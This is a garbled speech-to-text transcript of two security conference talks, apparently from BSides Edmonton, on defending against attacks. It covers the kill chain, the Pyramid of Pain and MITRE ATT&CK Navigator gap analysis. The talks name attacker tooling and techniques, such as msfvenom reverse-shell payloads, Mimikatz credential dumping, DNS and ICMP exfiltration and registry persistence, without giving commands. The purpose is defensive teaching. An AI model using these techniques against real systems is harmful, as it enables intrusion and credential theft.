got to think what how do I protect myself about the delivery mechanism because most of the time is something you're pulling into your network you know so if you're pulling it in again pen testing will tell you where your holes are perimeter monitoring you know this is actually going out there where your IDs is and stuff like that to see the information come in any type of scanning uh physical security you know dropping the USBs down there now do you have USB control one of the fun stories um I had working with Department of Defense is they thought USB drives were bad so they stopped every single USB drive across the network everybody was happy until they realized oh that's how

we give parking tickets out that's how we order food here's how we do inventory so they had to start turning them all back on to actually be productive you know and other things you look in here email gateways web proxies well if I'm going to a location because you know hey I just won a million dollars I want my million dollars so I'm clicking here now you need something to protect us the next step and then the people again you know last month was cyber Awareness Month question for you how many people still remember their cyber training that they took last month how many people actually took the test unless they made it mandatory okay so

the different things that hey you bring it to their attention maybe about a week or two later they might forget about it you know the best thing to you know if you want to test your group send an email phishing attack over Christmas week and saying hey here's where you get your bonus you want to see people click on it you'll probably get a good 70 to 80 people just clicking before they actually read anything and then also make sure you have a good internet usage policy I know we all hate policy you know but you know how much do you allow your users to actually you know go shopping you know this coming Monday

how much web usage is going to be out there you know for work compared to did I get the latest cyber uh Monday deals out there or even tomorrow being Black Friday how much shopping did I do there uh you know so kind of limiting where you can go what you can get to is another great way and if you have it in policy it makes it also easier if your employees accidentally click on it you can now actually have something against them before

expectation again that this is where you know I finally got to the end point you know so you need some type of protection on there you know we're way past the anti-virus days you know with signatures on things that we've had passed there you need something more powerful no so you need edrs you need Epp uh solutions that would actually see the Next Generation be able to have some machine learning and artificial intelligence behind it you know actually worry about patch management but Microsoft's actually sending out patches but if you don't patch you know you're leaving a door wide open for this and especially if Microsoft has a patch that probably means there's an x-plate

somewhere in the wild that I can just go grab put it in there change the payload a little bit now I'm on your system and once you get to this part you know we start also then getting into zero trust and I know a lot of people have talked about zero trust but it's really the easiest way I think about it is every single step I go they have to know who I am and where I'm going so each door I go through I got a badge same thing on a network every single box I go to if I badge some way either two-factor authentication uh you know IP grouping or something like that it will

help to limit if something does get in and then again you know people or users are you know fun and loving you know actually I've uh heard one story where the best tech support they ever got was actually on a piece of malware they double clicked on it didn't work I actually called the phone number on the email and the guy was so nice to take them step by step on how to enable macros in that Excel document and was then able to actually get exploited and then they were on the network foreign

I was really looking for a Windows time thing here I couldn't get one with the time going across but I think I found a pretty good name of capture install um this is actually a radon company that I took it off their web page there's some radar detecting software but you know we all see an installation you know they try to be quiet but if they get messy you might actually see a screen come up that's where I go into with people see if you see something say something you know hopefully you don't have too many noisy people in your network but if your normal day and an install screen pops up and it's not your patching

window hopefully you have smart enough users that'll say hey something strange to us happened something got installed uh on my laptop can you come take a look at it and again with security tools we're going back to endpoint you know you need some type of advanced tactics to be gathering to some type of telemetry from there to see what's going and then sister Integrity you know what has changed you know if I if I'm running a critical system those files should not be changed on a regular basis and if they are well there's probably something bad happening so if you have some type of system Integrity check you know going back to tripwire you know on

the lovely Unix side which was so fun to install back in the old days you know and then you know nowadays there's systems built completely round of you know based on check stumps to keep track of the files foreign

control this is this you know things that all movies are made out of you know you double click on it and somebody in some foreign country now has complete control of your whole network anybody saw you know uh the old movies from the 90s I loved how they were able to stream video over 56k modems you know I kind of get a simple dial-up to work but they're streaming videos in these movies showing it you know but they have control I mean it's also known as Hands-On keyboard because somebody's remotely doing something and this is actually the hardest thing to catch because you know actually we're humans we're pretty smart you know we can we're

not going to be doing step by step we might be hopping around and by hopping around it can confuse people you know so different things to put in there again you want something on the endpoint it's also nice to have you know firewalls at our perimeter so why am I going there you know a lot of firewalls nowadays have geo location on where the address is you know if you're not doing anything with Asia why are you allowing the people to go to Asia same thing with Russia and some other things along there and then also logging zero trust if you have logging turned on yes it might suck that you got breach but at least you now know what happened

so you can go clean it up that's actually a very important part of saying okay if I knew if I know what happened I'd slowly walk back and when the forensic team comes in you can see every single thing that happened and then you can for the next step figure out how to stop it and then again with people you know if they see something say something you know we have a lot of remote workers so you don't have as much control of their you know endpoints now but if they get a slow download you know if they're just checking their email and for some odd reason their internet bandwidth goes through 100 and it's outbound not

inbound you know the average home user uses a ton of inbound but very little outbound you start seeing spikes going on outbound there could be something happening you know either your son or daughter just you know figured out how to send spam out to the world or you know it could be really legitimate stuff going out there and then also you know command and control this is where they also get very sophisticated they might use protocols that you normally don't use for communicating how often have you used icmp for actually communicating back and forth I think the average person here only uses you know the Ping command to see if something's actually working it's a

great way to steal stuff from your company small but it's going to take a while same thing with DNS text records you know not that big but a great way to get stuff out because how much are you actually analyzing those protocols yeah you're probably seeing how much web traffic is going over how much VPN traffic you know how much you know if I'm analyzing my DNS traffic if it goes from 100 Megs as a normal usage spikes to a couple gigs that's probably a problem something's trying to get out or something was coming in that you're not expecting same thing with you know icmp packets you know yes it should be about 100 Megs on a normal Network in a day of

average size before you start getting into the gigs and stuff like that another huge uh red flag going out there and if the adversary actually makes it past this one you know they accomplished their goal they got what they wanted and this is the one thing I love saying this is when your PR person now kind of becomes your schism because they're now talking about hey what just happened I need to know this nothing against PR people but let sizzles keep their job and actually talk to the press or actually you don't want scissors talking to the Press about this but you know if you're at the state where PR is talking you know you are not

in a good shape you know but you know they're actually able to accomplish it so make sure you have things set up you know say both incoming and outgoing and again if people see strange things happening you know say something questions comments I heard there's a great lunch so I kept this short do we have any questions here for George sorry you finished the the talk yeah okay perfect um any questions all right George we'll be around let's have a round of applause [Applause] [Music] and uh perfect timing for lunch so help yourself do some sandwiches please visit the vendor Booth please come speak with George and the other speakers enjoy yourselves and have a great lunch we'll

be back at one o'clock

all right it looks like we've got uh a pretty full room as full as it'll get and might as well get started uh how was lunch sandwiches are good thumbs up thanks Bob all right so um we've got uh Jason Maynard doing the Cisco sponsored talk and uh no offense to the potential other five-time Edmonton B-side speakers but Jason is a five-time this is his fifth time presenting at uh at besides Edmonton so so maybe Prashant maybe Adam I'm not sure but definitely uh Jason's been here before Adam who yeah uh so uh Jason's Biola Jason has been architecting designing deploying security technologies that secure the most complex Computing environments for almost two decades his

understanding of operational and information Technologies people and process enable him to deliver effective comprehensive Security Solutions that align to an organization's security goals and strategic imperatives Jason is adept at addressing a range of risk profiles across multiple industry verticals skills he has cultivated as an end user security practitioner partner slash integrator and now manufacturer as a senior multi-domain architect focused on cyber security for Cisco Systems Jason is also active in the direct Community speaking at BC aware privacy and security conference and has delivered multiple sessions at not just besides Edmonton but other b-sides that well and Jason holds over 75 75 designations across a variety of products and Technologies including the ccie designation so with his talk uh the Cisco sponsored

talk entitled Advance percent uh persistent Defenders uh APD exclamation point uh please welcome to the B-side stage Jason Maynard

can you guys hear me all the way in the back can you guys hear me awesome all right so five years at besides Edmonton it's pretty amazing the work that they've done putting this event together and seeing all these great people uh trying to be better when it comes to security this talk is is a little bit interesting I I got thinking a little bit about how do we advance as Defenders and we talk about advanced persistent threats all the time and I came up with I think but maybe it's not maybe somebody's already came up with it the term Advanced uh persistent Defenders or threat and form Defenders we'll talk a little bit about that today

um so we're going to talk about who here knows the Pyramid of pain and not like one of those other sites that you probably shouldn't be going to yeah everyone knows that one but not this one so we'll talk a little bit about pyramid of pain um miter attack who's using miter attack in their organization today a few okay um insight into attack Navigator that's a tool within miter attack framework or miter attack provides us and anybody do an adversarial emulation sup okay cool all right so let's talk about pyramid of pain I think it's David Bianca that created the Pyramid of pain but basically what it is is it's a a pyramid and as you get higher up in that stack

it gets a little bit more difficult for the adversary to overcome um and so when you look at hash values as an example every one of us defend using hashes right um they're very trivial for the adversary to overcome and this is kind of setting the stage of why we need to elevate our capabilities it's not to ignore the lower stacked items like hashes and IP addresses and domain names but it's also to make sure that we're actually elevating and we'll talk more about that in a second so I'm not sure how well you're going to see this can you guys see it okay in the back with binoculars no I'm going to explain it so that's good right and it's

going to be recorded right harv or vendor right this is recorded so you'll be able to see it later anyway but what I'm showing here is msf Venom it's a tool that allows me to create malicious payloads that uh an adversary may want to leverage uh to try to drive an outcome one of those outcomes might be a reverse shell back to me so I can access that machine very simple right and so as um as an as an adversary I'm going to create this payload and I'm going to find a mechanism to distribute it might be a you know phishing link it could be an attachment um it could be through all kinds of

other means um or it could be USB keys at an event how many people picked up a USB key today right um but anyways it could be multiple different ways and so you'll have this shot at the very bottom here there's the shot 256 of that file in any one of your defensive tools that knows about that shot what are they going to do if they see that file kick it out right they're gonna block it so easy right that's an easy defensive mechanism that you're gonna use most likely fed through security intelligence but the adversary can very easily re-run this and get a different output so that sha would change so if they're clever

enough they'll make sure that they're constantly changing that payload which means that the hash that you're defending against is no longer relevant right you're no longer immune to that attack um so so the control is bypassed so that's why it's trivial right when we start looking at IP addresses how many people block based on IPS everybody does right and this is doing an analysis of a specific piece of uh a a specific uh piece of malware um called Tesla Crypt that probably everybody knows there's a decrypter out there it's not relevant today but it's really about the data points but you have an IP address you're going to block it easy peasy fast flux so you front this with the

domain you flip out the IPS constantly can you block that in other ways absolutely but if you don't have that mechanism in place the adversary is bypassing all your controls if you're doing IP based controls or hash so again very easy for the adversary to overcome but we're not disputing the value of leveraging that capability get rid of the noise right now when it comes to domains again we've got a domain the domain name is X we block it we're done right but no the the adversary is persistent and so maybe they're going to use domain generated algorithms to dynamically create domains and therefore that domain that you're initially blocking is no longer relevant and you've bypassed that control very

easy for them to overcome that specific control now you might say well wait a minute we've got some technology that does some reverse engineering around dgas and they they're able to predict what the the uh the future domain might be yeah that's a control and it's a valuable one but at the surface here the adversary is very it's easy for the adversary to overcome so those are the three kind of core pieces that we use usually through security intelligence or that you've went into a Blog and you've read you know a bunch of details around the blog and there's a bunch of iocs that's typically what we see and then we feed that into our controls and life is good

right we hope as we start moving into the stack this is where it gets a little bit harder for the adversary to overcome so for example if we're using um uh network-based controls like a C2 server that's embedded or a protocol that's embedded within malware that we're leveraging if it is malware um and we're able to mitigate at that layer it becomes harder for the adversary to overcome so an example of that is you've got these no malicious domains could be dgas right as an example and you've reverse engineered it the adversary what do they have to do to overcome it anybody want to throw out an idea what do you have to do to overcome it if

I have something that has an algorithm that could predict the future or reverse engineer the DGA that you created how do I overcome that as an adversary I've got to re-create that payload with the new DGA right so that now I'm I'm actually going back to the trenches a bit and having to do some development um and and recreate the DGA and the algorithm that I'm using in order to to overcome your defensive capabilities why it's annoying well now the it's not about changing an IP or changing the hash value or changing the domain it's now programmatically having to make a change that makes it difficult then we get into host artifacts these are artifacts within the host themselves

you've got registry key entries files directories mutexes anything like that that that resides on the host itself and this is an example of where malware's looking and trying to disable um you know the Windows security Center message saying hey alert alert the firewall's turned off right your antivirus is turned off go turn it back on they're going to try to suppress that message so you don't know when they disable your defensive capabilities within the platform very trivial control or mitigating capability right they're trying to reduce noise not really doing a whole lot but they are shutting down your protection mechanisms and if I'm able to defeat that as a Defender again they have to find another

way around this so maybe they disable it and you get a notification and now the user goes and enables it right or you have a process that's monitoring it and it re-enables it the moment it's disabled it makes it hard now for the adversary to disable that antivirus or that protection mechanism that you have on the asset so so again we're higher in the stack but they can overcome these controls now we get into tools so for example if I need to remove volume Shadow copies on Windows right everybody knows what volume Shadow copies are right the constant backup of your Windows systems and file systems so you can restore data if I need that in order to ensure that

you can't recover from ransomware that I've shared with you right over friendly terms maybe maybe not right um then it's going to be very difficult because what's going to happen you're going to get encrypted then you're going to recover the data and you're not going to pay and so what the adversary has to do is now they have to think of another means right because they're not going to be able to encrypt the drive and force you to pay because you have a recovery mechanism now this is a very simple one localized on the asset but what if you had a remote platform that was constantly doing backups from those systems very hard for them to disable

that that capability so now they have to think of another method now what would that method be if I can't encrypt the drive and and drive that ransomware outcome uh maybe now it's extortion so now I gotta siphon data from the asset send it somewhere to say hey I've gotten some photos of you last night right now you're gonna pay I might not be able to encrypt your drive where you were last night you're gonna pay me anyway right um again the adversary has to now come up with another method and then you get into ttps tactics techniques and procedures right and this is where it's very difficult for the adversary to overcome and this is an

example of some ttps that could be captured and we'll talk more about those in a second but in order for the adversary to overcome them it's very very difficult so this is an example here of uh Tesla Crypt needing to um Drive uh the the ability to encrypt on the asset now if I can't encrypt so if I have some technology doesn't matter the vendor if the capability exists and it monitors the the system for any activity that tries to encrypt files okay um maybe one or two files get encrypted and then that process gets killed because that's what that software does it manages and watches to see if there's some behavior that isn't normal such as

encrypting the drive at Mass uh automatically for no good reason it kills that process now one once that happens think about the adversary as I mentioned you you have to maybe think about what you're going to do in in order to get them to pay or drive some kind of monetary fund or disrupt whatever the the goals of the adversary is but maybe now I've got to steal credentials right because the encrypted partion portion of of my activities is never going to be realized and so now I want to maybe Harvest credentials how am I going to do that well maybe I need a Mimi cats type capability within malware to harvest those credentials so now I

get username and passwords and hope there's no MFA within the environment and I can start logging in as users within the environment so it makes it very very difficult right because you're making them go all the way back to the beginning and rethink their plans and it's very very disruptive not as a Defender but as an adversary so an example of this would be um you have this particular piece of ransomware has a whole bunch of tactics and techniques that are part of it and we'll talk more about it but there's things like initial access execution persistence and so on that the adversary must achieve in order to drive an outcome now how often does the adversary

need to be right within this at this attack chain or kill chain right they have to be successful in almost every portion of it in order to drive an outcome where do we have to be successful as Defenders anyone no one was launch that good your hands up you have to answer now that's right yes one of them see Cisco people give them something no I'm just kidding just kidding you have to go to the booth um but anyways yeah you're right we only have to be right in one spot they have to be right in the entire kill chain so the advantages to the defender so why are we getting pops so much right and I

think it's because there's complexity within the environments that we we uh defend against and it's some of the tooling that we have may have become a little bit more complicated than they have to be and we're not defending at the right layer it doesn't mean again you get rid of hashes ips and domains you still do that but you elevate the game so what does this do for us right it increases the cost of the adversary for doing business right at least with us it provides us time-based defense if they have to go up higher in the stack and change their tactics and techniques guess what we've got time now on our side to use other defensive capabilities

to disrupt that one area that won't allow them to be successful so what is miter well miter is a non-profit company out of the U.S and it's public private Partnerships and focused on cyber security these are the folks that bring you cves right vulnerability exposure database um and they've created what what is now known as attack and attack is really focused on adversarial tactics techniques and and uh and provides common knowledge around how the adversary goes about um compromising an environment and it was born in 2013 again it focuses on those ttps as I mentioned um there's a global accessible knowledge base you can use it to help um develop threat models and methodologies around private sector

public sector government uh and so on but really it focuses on the adversarial's perspective The Who right the adversary their goals the why and then the methods the how and who would leverage this well it could be red teamers blue teamers uh you can use it for Gap analysis assessments adversarial emulation we're going to talk a little bit more about those as we go along too everybody knows what a threat is right I'm dropping it down a bit because we I know we've got all kinds of different skill sets within the audience so in order for a threat to be realized you need a capability an intent and an opportunity so the capability could be the

adversary's tooling skills education supply chain so for example it develops an undisclosed exploit increases their capabilities right the problem with that portion of it is we have no control as Defenders at this piece none zero you can't control this they're doing this out of band 100 percent um but we need to understand the adversarial's knowledge and again that's where attack comes in now intent is really the adversary's motivation right their intent or willingness to succeed so why are they doing it well profit Espionage impacts uh to supply chain hacktivisms those are some of the outcomes again how much control do we have zero none but again we need to understand the adversary the opportunity this now it comes to

timing and knowledge of the target this is the Vols the zero days time of business this is where we have the ability to add a control or mitigating capability to defend or defeat the adversary so this could be things as simple as patching and networking segmentation MFA anybody here heard of it right MFA um but the adversary continues to elevate their capabilities as you add controls they find ways around them this is a never-ending game so think about this as the analogy right you've got uh some criminal robber right and they're portraying to be uh somebody from the anybody get it where they you know that says energy come show me your belt come come to their show me your

belt right and you see that maybe you don't open the door but lots of people do right they see that they trust the person they open the door and if if the robber or criminal wants to to rob you at that point you've just given them access to your your home right and so you open the door the Intruder gains access and does whatever they want to do they go to another neighborhood guess what they do the same thing they knock on the door you see the badge you open the door the Intruder now has access to your home Now by this time police are informed right by other homeowners that this is taking place so they know now there's a

robber portraying as an energy company they want to gain access to your home uh they use fake credentials in order to achieve that outcome right and so think of miter right miter's part of that right it's very similar the robbers the adversary the tactic that they want to do is to gain access to your home and the technique that they're using to gain access is these fake badges that harv gave out earlier today um but anyways now they go to the third home but now we're educated we know a little bit about it knocks in the door opens the door or does it right at this point does not open the door because we know that this this activity is taking

place call police we shut it down right so that's the analogy right that's why we want to work at these layers um even though we've got the door shut the door might even be locked right those are our hash values our IP addresses right but the adversary is going to elevate their capability think of it too as like the periodic table right this is the most important tool in chemistry right describes all the details around it it's concise you can't do anything in chemistry without it um and you know you can take two of some elements and make stuff right so two hydrogen one oxygen creates H2O miter attack is very much the same thing

you've got a column of tactics reconnaissance uh you know initial access Etc and then you have techniques how do they drive that outcome and then there's sub techniques that may be specific to what to a higher level technique and we'll talk a little bit more about that in a second but it describes the objectives desired by the adversary so for example if they want to get initial access privileged escalation these are the steps that they're going to take in order to drive that outcome and and the other thing that it provides is not only the tactic the technique sub technique but also the procedures that that are involved so it'll include a lot of details around the mitigation

capabilities within the platform as well so what does that look like well a tactic would be privilege escalation so this is the adversary trying to get higher escalation so if for example if I get on a Windows asset that's only got a local user that's not a local admin I want to get admin access to that asset and then eventually I want to get access to the domain controller and get Enterprise admin there right that's escalating my privilege over time now the technique for me to do this could be something like boot or log on auto start for execution and so what I'm going to do is I'm going to leverage the registry keys within windows and I'm going to put

in some things to automatically run that may help me elevate my privilege you can use this for persistence as well but that's what the adversary is looking to do in order to get escalated privileges now if I make it impossible or difficult or I monitor because you can't defend against everything I monitor these keys for example then I could Trigger or at least know that an adversary may be in the environment and if I can lock it down guess what they can't use that that tactic and technique and some technique right the game is over they gotta find a different way so again we concentrate on the root of the problem to to achieve a security

outcome and so think of the three layers at the bottom as the symptom so they're good they drive a specific outcome and they can defend against very you know commoditized type attacks even if they're a little bit Advanced IP hashes and and um and domain names aren't right that component of it is never going to be advanced and so um obviously we can leverage them but the problem with that is it's easy for the at the adversary or attacker to overcome now you get into the problem statement so as as you get up higher you know Network host artifacts tools ttps it makes it very very difficult now there is a challenge for Defenders here right

for example if I'm the adversary and I need Powershell in order to move laterally within the network and you shut down Powershell guess what I can't do it but if you also use Powershell as a management tool within the environment it might be very difficult for you to shut it down or wmic in a Windows environment Etc right so again it's hard because there's Nuance there's some tactics and techniques that are being leveraged that operationally you cannot remove so that's where you're going to have to leverage or rely on things that can detect maybe certain activities that might be taking place or looking for another area within that chain where you can defend against so what is inside uh attack so it's fed

with open source blog entries uh you know research and development from minor Community feeds the good thing about this this is real data that's happening live right this is not some scenario someone's thinking that could happen these are actually being realized in the wild and so you got 14 techniques when you look at there's a couple of breakdowns and we'll get into those uh but but for Enterprise we've got mobile and ICS as well but for Enterprises 14 techniques as of the fourth of uh November there's 193 techniques 401 sub techniques and then there's 135 groups like EPT 33 that leverage these tactics and techniques and then they're leveraging about 718 software applications and then there's a

bunch of mitigating control so the nice thing about this as well is not only are you defending at the TTP level you have now the ability to to build in mitigating controls just by going to miter and learning a little bit about the adversary right you might not be able to control all the ttps that you discover but there's going to be enough mitigating capabilities Within typically not always within the um the analysis that you're doing that you can add to your environment and hopefully make it difficult for the adversary that they move on to another organizations so Enterprise has Windows Mac OS and Linux cloud has is SAS and o365 Google workspaces Azure ad they've got

containers and networks Mobile's got IOS and Android so you could be at the Enterprise level or you can drop down into these specific areas of Interest uh and then there's the ICS um attack frame um uh miter attack framework that you could leverage as well you can also use sticks taxi feeds coming out of the platform Navigator Matrix we're going to show you a little bit of how we look at an adversary's tactic and techniques and then we overlay this with our controls and then we look at the gaps so we do a gap analysis to determine where the gaps are in our environment and then we can either accept that risk meaning that there's enough controls in other areas

to mitigate mitigate the overall risk or we address them right because they're concerned and that's an example of of a stick's output right you've got a threat actor attributed to a campaign and there's a whole bunch of different models that that support that so understanding the miter attack uh relationships between each one so you have a group over here right you've got a group that uses a technique that's driven with software that's trying to accomplish something the tactic and so over here you've got EPT 33 right the adversarial group that's going to leverage Mimi cats to do credential dumping and their goal is credential access right to systems there's mitigating capabilities that may outline some preventative capability

and they're all labeled for you too right so again now you're using a Common Language between all the people that you deal with that everyone can understand exactly what you're talking about you're not making this up right it's a standard language for the community and so now we've got apt-33 the tactic is credential access they're using Mimi cats that's the software and the technique is actually dumping the um you know LSA secrets from the Microsoft operating system um and so it's accessing the registry and dumping those keys down and then obviously you're going to look to crack those credentials to gain access to the systems so here's a little uh demo of uh miter attack so let me just fast forward it

here this is my new intro on my YouTube channel right you like it no it's got some scary kind of music at the beginning but anyways I'll get feedback later um well no laughter hopefully the launch was okay but uh but anyway so this is miter attack this is the website um you've got your matrixies on the side that's Enterprise Windows Mac OS Linux Cloud Network Etc you've got mobile and ICS and then on this side you can see an example of the Matrix and the tactics and techniques that would be Associated to that specific Matrix and each one's different because they're different use cases right there's different tactics and techniques that the adversary is

going to Leverage now if we wanted to focus in on Enterprise all we do is go to tactics and look at Enterprise and we can see the 14 tactics that are called out specifically and we can drill into each one of these has anybody been up to the site at all if you haven't you should book more if you're a defender or even a red team you should bookmark it because the red team is going to use it to find holes within an organization and and uh and highlight where the gaps might be and Defenders can use it to defend but now I've jumped into the tactic and then you've got your Technique it's sub technique

um here you've got a boot or log on auto start and it shows you over here on the and I'll just kind of move my mouse well the other there's the tactics so this particular technique actually has persistence and privilege escalation it could be used in both places right persistence is I get access to the system all the time and privilege escalation is gaining elevated privileges and again you scroll down it's got all the procedures the details around it uh softwares that is associated to it mitigation if there is any that'll be outlined here any detective capabilities that exist will be called out here as well and then tons of reference documents right again these

are real world scenarios we're not making this stuff so so there is uh papers that you guys can reference to get better insight into how the adversary might be going about this particular technique or uh or tactic um depending on on the level that you're looking at then you've got things like data sources mitigations groups software campaigns and each one of these you can drill into I'm just going to fast forward just a little bit here the other really cool thing is um and I'll show this in the example is that I can come in and look at my specific vertical so I can look at adversarial groups that are targeting my area that I'm defending for and so you could do

this with Finance education Etc and it gives you an outline of any software you know any group that might be targeting your specific vertical and it gives you details around it and I can build a matrix up specifically to that vertical and then focus on the adversaries that are actually coming after me versus all the commodity-based stuff all the noise right one of our biggest problems is patching systems right you get a vulnerability but you get thousands of them so which one do you prioritize right you probably want to prioritize one that's actively being exploited um and that's a popular Target before something that's got the same CVS score but much lower in regards to popularity

and and there is no active exploit but it's still ranked as 10. so this screenshot here is um showing you the miter attack Navigator tool so you can do this on on the web um or you can do this you can download it and run it on your own box so I have it running on a Cali box because that's where I do both the the red and The Blue Team side from in my analysis but you can have it localized on your box and save everything locally so you have it there but I can then take that finance and I can take all the groups associated with that and I have a nice Matrix that

shows me all the tactics and techniques that the adversary is using or the adversaries in this case and then I can look at my software or sorry my controls that I have in the environment and I can overlay to see the discrepancies between the two so this is where we get into building threat and form defense right advanced persistent defense the the threat picture how do we build this out and so here's the example right there's Navigator and you could be looking at a specific adversary campaign a vertical whatever it might be um and these are all the things that this particular adversary is going to use right um so exploit so initial access well

they're looking for X uh the exploit publicly facing uh application right replication through removable media well that might be easy if I didn't allow removable media on an asset then that eliminates that risk right um and so that's the the opportunity as Defenders is to go through this and truly understand how the adversary is going to go about compromising my environment so when we draw it out we have the ability to start right from scratch come in you type in something like Financial it gives you all the outputs um and then you could look at it from a an adversarial like d Panda so if you wanted to focus on a specific adversarial group and understand how you

defend or line up against that particular adversary then you can actually import that into Navigator see all their ttps then again like I said you can overlay that with any of the controls that you might have in the environment and I'll show you that example I've got a couple of them actually all right so build your own coverage map so this is an example of that and we're going to go right into this in in a second here but you can even throw through Navigator so I showed you in the miter attack uh tool set when you go to the website you can actually go in and put in finance and it gives you the

output and you can see that but in Navigator you can do that on uh within the tool base itself and so this is showing you that example here once you have it say downloaded on your local machine you can have it all saved localized and then you can start looking at in this case education uh because I thought it'd be relevant for today I can look at all the threat groups that are associated to education in this case there's nine fret groups that Target education then I can have my rubric score right again set some thresholds that means something within the organization itself obviously should align to uh whatever uh rubrics that we're using for risk within

the organization and then once I do that I can start looking at these in detail as much as I want I can add comments to it I could um uh you know look at the tactic and technique if I'm not really familiar about how the adversary goes about it I need a little bit of Education I can do that all from this page I don't need to go back to to the main miter attack page and do that I can pivot right from here and get access to that data as needed so here's I've got three demos uh one is looking at a specific threat um so this is a specific threat that you can use any vendor it's not uh specific

to a Cisco or anybody else if they have any mapping you'll be able to pull that data into Navigator and so you can see here this does a good job of letting you know about the registry keys the file hashes all the indications to compromise or some other details here really doesn't matter because all I want to know about is the ttps this particular threat not necessarily an adversary because an adversary many adversaries may be leveraging this but I want to know the ttps for this particular threat and so I can see here they've got persistence privileged escalation all of that's available to to me now in regards to the adversary's ability now if I import that using something

like Json I import it into Navigator I now see that right and so I've you know give it a name I've given it a score of one um and it'll show that in a second I can also pivot into each one of these um and uh but very clearly I know that they use persistence for both uh a persistent and privileged escalation over here um I can see that it's used at twofold right it's used for persistence and privilege escalation so again if I can monitor that key maybe I can't stop it maybe I can but if I monitor at least I know if there's any changes to the organization right or at least that

asset I should say now if I have an endpoint product this is an example if I bring that endpoint products capabilities in and again there's different thresholds here green means that there's a lot more of that capability there's a lot of nuance in this right of how that control might be met and so um for example red might be uh I've got more coverage green would be less coverage of that particular tactic and technique um and so now I know where my my endpoint capabilities are so that's pretty easy right now I've got a good understanding of my controls in my environment and I've got a good understanding of the ransomware or that specific threat

now would I have the ability to do let me just fast forward is is take this again do some research about each one of these if I need to so this is showing you we're jumping into that boot or log on auto start the registry keys startup folder how they're leveraging this for both persistence and privilege escalation again any mitigating capabilities I can start implementing anything I can do to detect changes to that I'm going to flag or try to implement within the organization if I haven't already but more importantly what I want to do is create a third layer here right and this I think is where the beauty comes in now I'm able to take

um both a which is the threat B which is my controls and create C right which is a combination just highlight that where the gaps may still exist so basically what I'm saying is take a and b and then anything that's uh not here so what I'm going to do is actually write a very simple expression right a and not in B right then highlight it we'll go ahead there's some other things that you can set like coloring gradient links metadata you can add all of that and I show that in the video as you walk through it and now I can see this right I can see that I have defensive capabilities in majority of the

adversary's ability but there is some areas of opportunity for me as a Defender this is what I mean by leveling up the game this isn't an IP this is not a hash this is not a domain that's stuff you're already doing right and most likely that's already being fed through some auto-generated tool right outside of the research that you might do that discover that you uncover maybe an IP or domain or or hash but most of it's going to be done through a programmatic feed of some sort and and so here I've got a couple of opportunities communication through removable media as I mentioned earlier if I now have a capability to say maybe even as simple as using Group Policy

objects to to uh mitigate uh the access to um USB keys right you can't enter it maybe it's as simple as that or I have a software-based tool that says if you plug in a USB key and it's storage you can't access that device but that's now I'm elevating or I might be you know what that risk is so low of having something come in through removable media yeah I accept that risk and I have other controls elsewhere within the organization to mitigate that all right so this one here is apt-33 so I'm gonna I'm gonna go a little bit faster here because I'm sure you don't want to see um kind of the the two examples I'll

show you the output here but but basically I can come in here and grab EPT 33 so if for whatever reason there's a new campaign you know a a threat that's released out and saying look at apt is doing X Y and Z we saw that a lot with Ukraine when the war started right there was certain adversaries that you're going to look for um and then you're going to start building your defensive capabilities this is one way of coming in and saying okay apt-33 is on the prowl there's stuff that they're doing I want to learn a little bit more about them this is a good way of doing that and then I could

import that into Navigator right once I import it into Navigator I now have their capabilities outlined here you can see them here right this so this is APD you can give it whatever name you want exploitation for client X you know execution exploitation for privilege escalation valid accounts Network sniffing like these are some of the things that you can do so think about Network sniffing you know there might be things that you can do to minimize or alert you uh that that activity might be happening in the environment it's not a control right that's not the only thing that you're going to do here detection and response capabilities could be as important if not more important than the

ability to prevent right no matter how many tools you have how many vendors you deal with you're never going to prevent 100 of everything a hundred percent of the time so the ability to detect and understand a threat and then ultimately respond and reduce the overall attack surface is going to be critical right reduce that blast radius oh did I just uh I jumped too quick sorry and then we're going to create another tab in this case I'm going to pull in another a bunch of capabilities maybe I've collected so I've taken all my tool sets as an example and I've went in and I've created a matrix for all of my tools and you've probably

what happened there uh just a second sorry

that jumped and then so what's going to happen here is um hopefully you've got a lot of this coverage right when you take your entire stack of keep and they'll just take some work right you're probably gonna have to reach out to your vendors and get them to kind of break down there's Nuance in this too right so they might say that they have a capability to detect a TTP right but not the ability to control or mitigate right so there's going to be some Nuance here and that's where the color coding may come in but let's say you go through and you've done that analysis you've grabbed all your tool sets and you've shown your

coverage how many people have done this I've went through this exercise see very little and it's unfortunate right and again it's because we're so busy doing the commodity based stuff it's hard to make time to do this it's like you know a lot of times if you're building an infrastructure you're going through and you're building out that infrastructure you get it built you could have programmed it which may have taken another week and then replicate it forever but because it takes an extra week you do it the other way right and every single time you have to recreate it same thing here if you put in the work it does take some work but it'll

save you a ton of time later and also increase your overall defensive capability and knowledge in regards to how you're defended so you can see there's pretty wide coverage here you can almost see every single tactic remember tactics are at the top has coverage and then technique again has some coverage and then there's sub techniques depending on the technique itself okay so I've got that if I now do a versus B and I look at my Gap in fact in this case I don't have any now again there's Nuance into this right but this might be enough to understand that you know what we've got a lot of good coverage for this particular adversary that we don't

need to focus on this right we've got enough defensive and alerting capabilities in play let's move on and focus on something else of value to the business not focus on trying to add something that's not going to add a whole lot of value to the organization like maybe even if something like removable disk like or media was the one thing that you didn't have coverage on that could be an acceptable risk right so it's time to move on all right so last but not least at least in miter is um this one's just showing in education so let me just um jump back in here oh boy here we go you guys see that too

yeah yeah so this is this is Windows um no no windows is good it's not today but uh but anyways um we'll see what happens here but um this is taking uh this one's looking at it from a vertical perspective but the same thing applies here now you look at education you add all the threat groups software anything that you want that might be targeting education you create your your analysis right so your Matrix now you know all the tactics and techniques the adversaries because adversaries this time not just one is going to leverage um in order to um compromise the environment and then you're going to take your controls right your your detect prevent and response

capabilities you're gonna overlay it and look for the gaps that you might have in the organization and then you're going to build that out and you could save this I show you where you can save out the Matrix when when you do that the the when you put the two layers on top of each other you can save that Matrix out and put it in your risk analysis report right you can build it out and say look we've investigated these are the adversaries that Target education these are the tactics and techniques that they leverage and here's a nice screenshot of what that looks like at least for the internal teams I have a feeling if I

pull this out um it might come back that's not good any questions or comments up to now because we need you know I need a like a few minutes here anybody oh do we have to do the mic thing yeah are there any uh questions we'll insert a Scotty Star Trek joke about pushing it too hard captain foreign yeah it's uh it's frozen so we have about five minutes we can certainly address any questions or you just wanted to finish off your presentation in the dark

